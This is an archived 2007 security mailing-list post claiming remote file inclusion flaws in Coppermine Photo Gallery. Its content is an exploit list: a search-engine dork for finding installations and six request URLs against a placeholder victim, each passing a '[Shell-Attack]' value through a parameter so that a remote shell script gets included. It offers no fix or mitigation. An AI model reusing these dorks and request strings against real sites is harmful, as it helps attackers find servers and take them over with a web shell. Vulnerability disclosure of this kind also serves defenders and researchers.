OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Remote File Include In Script Coppermine Photo Gallery

From: RaeD Hasadya (raedbsdmail.com)
Date: Fri Mar 09 2007 - 09:13:04 CST


By Hasadya Raed
Contact : RaeDBsdMail.Com
------------------------------------
Script : Coppermine Photo Gallery
Expl : Remote Include File
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"
------------------------------------
B.Files :
image_processor.php
functions.php
picmgmt.inc.php
plugin_api.inc.php
index.php

Exploits :

http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack]

----------------------------------------

By Hasadya Raed

--
_______________________________________________
Get your free email from http://bsdmail.com